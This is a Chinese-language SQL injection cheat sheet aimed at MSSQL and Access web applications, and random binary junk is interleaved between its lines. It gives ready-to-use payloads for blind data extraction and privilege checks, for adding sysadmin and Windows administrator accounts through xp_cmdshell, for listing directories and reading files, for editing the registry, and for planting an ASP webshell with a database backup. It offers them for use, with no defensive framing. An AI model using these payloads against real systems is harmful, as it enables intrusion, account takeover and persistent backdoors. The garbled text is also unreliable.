1.判断是否有注入;and 1=1 ;and 1=2 lm��&C!{�K
2.初步判断是否是mssql ;and user>0 ���EVj��48
#�V8�='qD
3.注入参数是字符'and [查询条件] and ''=' ^tuJ����M:
AN�Cg�c�h\
4.搜索时没过滤参数的'and [查询条件] and '%25'=' {Pg7�I�YjH
7q|(��ZZ�a
5.判断数据库系统 M{7E�FTy!y
��n�u$LWC-
;and (select count(*) from sysobjects)>0 mssql `z�3?ET���
P
N_QK ��Z
;and (select count(*) from msysobjects)>0 access Y#6@�0Nn[G
o\Hg2�^YY>
T"Q4vk,3*J
j�<�+iL]�b
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �.@��APxeU
"�MXd�!���
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ;8g#�"p*&�
�V�b 4Qt#o
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �~�pj9_�I�
SA��G)�vmm
9.(1)猜字段的ascii值(access) ��(>0d+ KT
?V[yw=sl04
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 z�PV/{�)�S
oUw-l_�M]�
(2)猜字段的ascii值(mssql) z6�G^�BaT'
�|<ke>j/6n
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
W{;!JI7;z
r+0)��l:{.
10.测试权限结构(mssql) �HXd�PKS4q
O|j5ulO}&"
��VUF�7-C*
)hQNIt3o_�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- i�%*x7zjY{
XE$e�Hx�3;
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- e�`��$v\7K
~:�)$~g7>b
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- :M3��l#`4Q
o-O/M�S���
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- XtfL{Fy|T�
�'�KQu�z)-
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �g\(7z�
P�
VY� _��(0
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- hkU�#
��lt
C
[2tH2*#�
;and 1=(select IS_MEMBER('db_owner'));-- w�Oi>i`�D&
)X^nzhZ2O"
X�Y�4���s�
#�����zy,x
11.添加mssql和系统的帐户 _-8,}F}W#s
g��'Xl>q��
;exec master.dbo.sp_addlogin username;-- �c=
�a�+7>
;exec master.dbo.sp_password null,username,password;-- �T>uLqd{hH
)c�q�hb�R
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- )�edM@beY_
}(tG�j�x]�
;exec master.dbo.xp_cmdshell 'net user username password Wt3�\&.n��
6!"15d�PN�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- N���M8��F
�Z@ws,�f^e
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?|hzAF�"U�
e#'`�I^8l�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �KFV]2mFN�
-~(0�:@o ;
u8�<�=FV3�
@6D<D��6`�
12.(1)遍历目录 9i�`LOl:;�
�#^v5Eo���
;create table dirs(paths varchar(100), id int) 3mJH�k<m8T
;�C"J��5RA
;insert dirs exec master.dbo.xp_dirtree 'c:\' p-7d��J���
v}_$9&|S��
;and (select top 1 paths from dirs)>0 /�BIPLD�N6
If&p$p�AH?
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) C3_*o���>8
�{9l�4 pT3
����`�\Npu
|M
�K-�~ep
(2)遍历目录 )@Ze��l.XD
"7<4N�V@yQ
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- X&�lk�A�
(
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �,���!Hl@(
#S�qOJX�~Q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �9x�KFX|*$
f(�_qc�gXp
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 1X�s!�ew)>
U�50�X�`J�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �rz�TyHK�[
m|�7g{vHVV
��?�B}>�[�
u�51/B:+��
13.mssql中的存储过程 h��NoN�=J�
^Ue.9#9T&g
xp_regenumvalues 注册表根键, 子键 Ci*5�E�$+\
U=y����D�!
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 uo{QF5z�]
=az$WRV+7!
xp_regread 根键,子键,键值名 aFSZYyPxwv
,f1wN{�P�
;exec xp_regread �eP2 y�U��
{Y@[hoHtF
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �>'T%=50YH
�;I7Z*'5!�
xp_regwrite 根键,子键, 值名, 值类型, 值 G�S,pl9#V_
v�n_avYwiy
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @!�M�b�PS
foFn`?�LF
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 aH$~':[�93
:qZ�^<3+:
xp_regdeletevalue 根键,子键,值名 drZ�w�#�b
�@fK`l@�K�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 9BY b{<0tS
?)X�@4�Jem
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �*��=F�cu@
}�F.1j!71L
vP?�yl "U
<��Q0&[q;Z
14.mssql的backup创建webshell Yx%%+c?.��
a@�a1/��3
use model /0c&�!�OP�
_NkN3f5 1L
create table cmd(str image); 4J_%qux��O
���R�k=B;�
insert into cmd(str) values (''); �q38; �w~H
)6�j:Mbz��
backup database model to disk='c:\l.asp'; +�?<jSmGW
g\.N>P@Bu�
��v\��ox:C
Gs6�#aL}]R
15.mssql内置函数 r%���#qbsN
�~4^�e� a�
;and (select @@version)>0 获得Windows的版本号 g�3Q� #B7A
'�!I?C/49k
;and user_name()='dbo' 判断当前系统的连接用户是不是sa at*�=#?M1?
xpxm�9ySwu
;and (select user_name())>0 爆当前系统的连接用户 4��
5lg&oO
9��VByFQgM
;and (select db_name())>0 得到当前连接的数据库 ��:1�=?/8h
c�5;RO�nTm
$>�UzXhf}\
Jc)�1����}
16.简洁的webshell XJ\��q!{;h
��5Z[�D(z�
use model r�&[~/m8zl
�EyeL�C�6u
create table cmd(str image); T��82_`u�
YZ�>cE���#
insert into cmd(str) values (''); g)9��/z���
-��0�`hJ_(
backup database model to disk='g:\wwwtest\l.asp';
